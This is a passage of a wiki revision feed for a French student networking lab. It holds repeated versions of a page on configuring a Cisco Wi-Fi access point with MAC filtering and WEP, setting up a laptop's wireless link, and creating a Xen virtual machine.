&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&lt;br /&gt;
on se connecte a notre MV&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage &lt;br /&gt;
apt-get purge systemd&lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22542</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22542"/>
				<updated>2015-10-28T10:34:30Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&lt;br /&gt;
// on se connecte a notre MV&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage &lt;br /&gt;
apt-get purge systemd&lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22541</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22541"/>
				<updated>2015-10-28T10:32:32Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
